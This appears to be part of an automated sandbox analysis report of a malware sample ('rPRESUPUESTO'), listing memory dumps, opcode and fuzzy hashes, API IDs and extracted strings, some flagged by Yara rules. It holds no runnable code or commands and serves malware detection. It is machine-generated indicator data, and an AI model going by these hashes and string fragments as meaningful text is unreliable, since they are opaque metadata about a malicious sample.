                                                • Opcode Fuzzy Hash: ff3b86dc7789d5c4c40c868fd5990806e4a92e9a80132d749271452877cfce15
                                                • Instruction Fuzzy Hash: 9D90023120545846D54171584405A46005597D1305F55C011E5078694DDA258F99B762
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 760e2433f66de56084f7d21719d11dc5fd757038d0737a952316fc670c28a49c
                                                • Instruction ID: fb8dadb9d037d6f100ee6e2ff70bd71fd1647acdc4037a736a45a8f102287f67
                                                • Opcode Fuzzy Hash: 760e2433f66de56084f7d21719d11dc5fd757038d0737a952316fc670c28a49c
                                                • Instruction Fuzzy Hash: 3A90023120141806D5817158440564A004597D2301F95C015E5039654DCE158B9D77A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b0fd15ed0f062b28e25009031f9203da21ae45f158b3fc1fb37cd2d094ef9fc
                                                • Instruction ID: 6aab1816f729cc167c39f7035551b555c31879280497ed366f943b4438d5d0a2
                                                • Opcode Fuzzy Hash: 3b0fd15ed0f062b28e25009031f9203da21ae45f158b3fc1fb37cd2d094ef9fc
                                                • Instruction Fuzzy Hash: 229002A1201550964901B2588405B0A454597E1301B55C016E6068560CC9258A959236
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ee63ff03dc3a7ed4204b00eed60b08af12dd2bcc9f772125b58428aee5a34e0
                                                • Instruction ID: e0d69c483c95bc1a0e120bf4ad395f9867c80954d6b142a19ee8079cab66307a
                                                • Opcode Fuzzy Hash: 6ee63ff03dc3a7ed4204b00eed60b08af12dd2bcc9f772125b58428aee5a34e0
                                                • Instruction Fuzzy Hash: 92900225211410070506B5580705507008697D6351355C021F6029550CDA218AA55222
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975269752a315de936d7784e938b3614c08fddb2a5148f58f4673bd8f9714ff3
                                                • Instruction ID: ac0a6fd2832834529d3bdaa8dac944df914f2343e7c468d0d6223e2597d45f7e
                                                • Opcode Fuzzy Hash: 975269752a315de936d7784e938b3614c08fddb2a5148f58f4673bd8f9714ff3
                                                • Instruction Fuzzy Hash: 7B900225221410060546B558060550B0485A7D7351395C015F642A590CCA218AA95322
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d8ee63614ef686d2d52fd28a0677017c8bf166f112ce6ce0794e20ed4030a8e
                                                • Instruction ID: a86e5fd6f110eda708b0a8b98cffb8b3c691f7d317b6f1f034d17f9d21e20fc9
                                                • Opcode Fuzzy Hash: 7d8ee63614ef686d2d52fd28a0677017c8bf166f112ce6ce0794e20ed4030a8e
                                                • Instruction Fuzzy Hash: 7890023124141406D542715844056060049A7D1341F95C012E5438554ECA558B9AAB62
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c11f828d377f4da50fc1dd1a895e2dbc5ab63ef9219f838ad9031526b3eaf216
                                                • Instruction ID: d88217034d2ca141f2bee9401c08eeaa4b414fa0663a9143381a8a932278f97d
                                                • Opcode Fuzzy Hash: c11f828d377f4da50fc1dd1a895e2dbc5ab63ef9219f838ad9031526b3eaf216
                                                • Instruction Fuzzy Hash: 11900221242451565946B15844055074046A7E1341795C012E6428950CC9269A9AD722
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 472af300c02b4d2efa780bd2b5fddc53f2fc6c98d31ed6afd413cd3fd719709f
                                                • Instruction ID: 9cf5f0d54091d5c77c58082bc33484f58f9f9a9a2e0a5c7aaea4e7eec727a0a5
                                                • Opcode Fuzzy Hash: 472af300c02b4d2efa780bd2b5fddc53f2fc6c98d31ed6afd413cd3fd719709f
                                                • Instruction Fuzzy Hash: F490022120545446D50175585409A06004597D1305F55D011E6078595DCA358A95A232
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 753ab0bcf6f680a9e60479f8442757eef1659b41e8e550a91c68e7d0418ca8c4
                                                • Instruction ID: 840de6c0ca619e09f983c85e07cf1d45b48af0a1e52b729fc9abbbb9b40b09ad
                                                • Opcode Fuzzy Hash: 753ab0bcf6f680a9e60479f8442757eef1659b41e8e550a91c68e7d0418ca8c4
                                                • Instruction Fuzzy Hash: 8D90022921341006D5817158540960A004597D2302F95D415E5029558CCD158AAD5322
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66280db40298f9fdedbf9783928bbde22fdd3499e99a9eb7662e89298d891ece
                                                • Instruction ID: d34d3c3e7a75ea215eb09b71a0718d6f50c9f58e6dc82c75cbc79cab4c7f4086
                                                • Opcode Fuzzy Hash: 66280db40298f9fdedbf9783928bbde22fdd3499e99a9eb7662e89298d891ece
                                                • Instruction Fuzzy Hash: 8090022130141007D541715854196064045E7E2301F55D011E5428554CDD158A9A5323
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84d475abae4b094bab51fcaaba9103775d2f48c0e9bc7ab949db6bd30c8cde0e
                                                • Instruction ID: 1bdf134bcdb2f85ba4fc41037815b059300b9d9e6b5f7067657f06749750b139
                                                • Opcode Fuzzy Hash: 84d475abae4b094bab51fcaaba9103775d2f48c0e9bc7ab949db6bd30c8cde0e
                                                • Instruction Fuzzy Hash: 2D90023120141406D50175985409646004597E1301F55D011EA038555ECA658AD56232
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc02191a4922766295eeb860901008f943c0888bd5d6c0a09c4865d1355d30c5
                                                • Instruction ID: 239041ed5b26eea1eb1cda8da4f862c3c854d415c24eff75b10f54efee917a8c
                                                • Opcode Fuzzy Hash: cc02191a4922766295eeb860901008f943c0888bd5d6c0a09c4865d1355d30c5
                                                • Instruction Fuzzy Hash: 9B90022160541406D54171585419706005597D1301F55D011E5038554DCA598B9967A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98b1041bca71ab43b8cdd8d8f6bd7efbbc02f099b831d581280d9a65ccfaa7aa
                                                • Instruction ID: 411171b1bfe5d4da1b1c0a071c30b24d380450d55b0a0e4af0c99e13578fba22
                                                • Opcode Fuzzy Hash: 98b1041bca71ab43b8cdd8d8f6bd7efbbc02f099b831d581280d9a65ccfaa7aa
                                                • Instruction Fuzzy Hash: 7090023120141407D50171585509707004597D1301F55D411E5438558DDA568A956222
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09206e9d3c50193aa89872d9fd845d8c01d74c6890fe754deee46d71a02d0983
                                                • Instruction ID: cc5c01b4f6cf90035e6238997820de810f116caafbe2e921f317ff46cca7c76f
                                                • Opcode Fuzzy Hash: 09206e9d3c50193aa89872d9fd845d8c01d74c6890fe754deee46d71a02d0983
                                                • Instruction Fuzzy Hash: BF90023120141846D50171584405B46004597E1301F55C016E5138654DCA15CA957622
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8a4d680c67ee9e4357e743eda9a3d191f39cbbf1faab40fdbc875ffa58da3d7
                                                • Instruction ID: 8beed3f05b6e7147c2b13ccb9e1baa906f22dc98a5b2b5a0f7ea9d5c96758365
                                                • Opcode Fuzzy Hash: b8a4d680c67ee9e4357e743eda9a3d191f39cbbf1faab40fdbc875ffa58da3d7
                                                • Instruction Fuzzy Hash: 3E90023120181406D5017158481570B004597D1302F55C011E6178555DCA258A956672
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                                                • Instruction ID: fdcdca2c39e05ca06bbf546ad167a1c05602ca3ecdbccd4c21556df75494c4b8
                                                • Opcode Fuzzy Hash: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                                                • Instruction Fuzzy Hash: 1B90023120181406D50171584809747004597D1302F55C011EA178555ECA65CAD56632
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                                                • Instruction ID: 759e33711e3df367780cf9474ebbcf2b491d37e92b9842ac0eedf854ce6f1669
                                                • Opcode Fuzzy Hash: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                                                • Instruction Fuzzy Hash: 24900221601410464541716888459064045BBE2311755C121E59AC550DC9598AA95766
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                                                • Instruction ID: 8614b132e70a6243bdc4cf5812171f364d3e988628d5cb6e27cbefc664eedbda
                                                • Opcode Fuzzy Hash: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                                                • Instruction Fuzzy Hash: A7900221211C1046D60175684C15B07004597D1303F55C115E5168554CCD158AA55622
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                                                • Instruction ID: 96a30afb2279e16baf28d643eaa6eb0053075ceb8dddcc606288796155f83914
                                                • Opcode Fuzzy Hash: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                                                • Instruction Fuzzy Hash: 4A51F6B2A0011ABFDB11DBAC899097EFBBDBB483407608229F4A5D7645D734DF4087E0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                                                • Instruction ID: 4d51e301cf5f431a4085dedf14ff1180aa6c557132e50d539c6309c388d1a702
                                                • Opcode Fuzzy Hash: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                                                • Instruction Fuzzy Hash: C651F1B5A40646AACB30EE9CC99087FFBFAAF44300B44846DF496D3642E674EB40C770
                                                Strings
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01844655
                                                • ExecuteOptions, xrefs: 018446A0
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018446FC
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01844725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01844742
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01844787
                                                • Execute=1, xrefs: 01844713
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                                                • Instruction ID: 74289f425b6418d8be41dac9285a9a8398f811a55d6a5c9898360217955806e2
                                                • Opcode Fuzzy Hash: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                                                • Instruction Fuzzy Hash: 1D51197160021DAAEF62EAA8DC95BB977A8EF14344F1400A9E606E71C1EB70AB458F51
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 85cecca8b308c48b45c1cf395c914ab586026284699d9b2b98a79a262f643a8d
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: D081E372E052498FEF258F6CC8517FEBBB9AF54760F184919E851E7299C7308A40CB61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                                                • Instruction ID: 33c38526ee9265dfe10424da57a061e01d01804813582f817285b848e3c50869
                                                • Opcode Fuzzy Hash: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                                                • Instruction Fuzzy Hash: 182151BAA00519ABDB11EF7DC840AAEBBE9EF54744F54011AE905E3204E730EB11CBA1
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018402E7
                                                • RTL: Re-Waiting, xrefs: 0184031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018402BD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                                                • Instruction ID: d0138a0c60c462586f2754cbd83f003971552e3aef632858dbfbc3af8f22222b
                                                • Opcode Fuzzy Hash: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                                                • Instruction Fuzzy Hash: 97E1AA326087459FD725CF28C884B6BBBE0AB88714F140A5DF6A5CB3E1DB74DA44CB52
                                                Strings
                                                • RTL: Resource at %p, xrefs: 01847B8E
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01847B7F
                                                • RTL: Re-Waiting, xrefs: 01847BAC
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                                                • Instruction ID: f8eb3268073753a88c83e6c109dae21b6e48363a430e10f1477d2f4160b27a55
                                                • Opcode Fuzzy Hash: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                                                • Instruction Fuzzy Hash: B941263530170A8FD726DE29CC40B6AB7E5EF88710F100A1DFA56D7280DB31EA058B92
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0184728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 018472A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01847294
                                                • RTL: Re-Waiting, xrefs: 018472C1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                                                • Instruction ID: 5ad9ec352261f7957b9e8bfe31103b7ddfaf6803214728911d6b02200fa8f19a
                                                • Opcode Fuzzy Hash: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                                                • Instruction Fuzzy Hash: 9041227570061AABC721CE29CC81B66B7A5FB94714F100619F956EB280DB31EA4287D2
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                                                • Instruction ID: dd5b80cc0211d80568b7e559f871a180add6955aa70751cd6103ec3b9cca9cba
                                                • Opcode Fuzzy Hash: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                                                • Instruction Fuzzy Hash: 4C317376A002199EDB20DE2DCC50BAEB7F9AF44710F84455AE949E3200EB30AB44CBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: e3732f5f58d65c20e8a1baa20bd1bc0f58955fbe311d0d13f036fcd12286329a
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 2F91A173E0020A9AEB24DF6DC881ABFBBA9AF45720F64451EE955E72C8D7309B408751
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                                                • Instruction ID: 8b0973c9e3fb7a8c421c9a124d811706ba930401231ee9ef54327a80ae95c6a6
                                                • Opcode Fuzzy Hash: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                                                • Instruction Fuzzy Hash: 90810C71D002699BDB31CB54CC45BEAB7B9AF48714F0441EAEA19B7280E7705F84DFA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: /Q$N
                                                • API String ID: 0-3608907964
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                • API String ID: 0-1002149817
                                                • Opcode ID: ee3640a867f0dbdd100c4c9f0395c6f35ca0ce7715778721c3bb5cf52ca37833
                                                • Instruction ID: 12b2271dbe2c3ac65ee60d40f35003c486eaa1d6080927026ae51370aecd6f93
                                                • Opcode Fuzzy Hash: ee3640a867f0dbdd100c4c9f0395c6f35ca0ce7715778721c3bb5cf52ca37833
                                                • Instruction Fuzzy Hash: 02C142B1D002689EDB20DFA4CC44BEEBBB9AF45304F0081D9E54DAB241E7B55B88DF95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$%$)$)$5$>$B$E$F$F$H$J$Q$T$g$h$m$s$u$urlmon.dll$v$w$}$}
                                                • API String ID: 0-881177885
                                                • Opcode ID: ee904c68d7b5270f254012b6a3f5880740e588209a6f949d20b04d2b69bed586
                                                • Instruction ID: f89bdba61cff3642d4367159bf689ae3fa651695981b4c08f1a018a178dff39a
                                                • Opcode Fuzzy Hash: ee904c68d7b5270f254012b6a3f5880740e588209a6f949d20b04d2b69bed586
                                                • Instruction Fuzzy Hash: 8D61E4B0C0136CDEEB60DFA5C9447DEBAB5BB05348F10819AD54CBB251E7BA0A88DF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                • API String ID: 0-3236418099
                                                • Opcode ID: b18e32d9d060234f0a38c152a3046ed39d737d0dbbeb96c577cf9192788ba9f3
                                                • Instruction ID: 85b0d4e1b6dd6d59aa9f7908623bc71dc6ee24d04a36020fcf830d3f4d15c4b8
                                                • Opcode Fuzzy Hash: b18e32d9d060234f0a38c152a3046ed39d737d0dbbeb96c577cf9192788ba9f3
                                                • Instruction Fuzzy Hash: 919152B1900228AAEB20DF95CC84FEE77BEFF45704F0085A9E509A6140EB756F85CF61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                • API String ID: 0-3236418099
                                                • Opcode ID: 2178631da5fc8e0a8a89d7700d4c4b634ee53257f18bca5dfd2dbdb3406ddbee
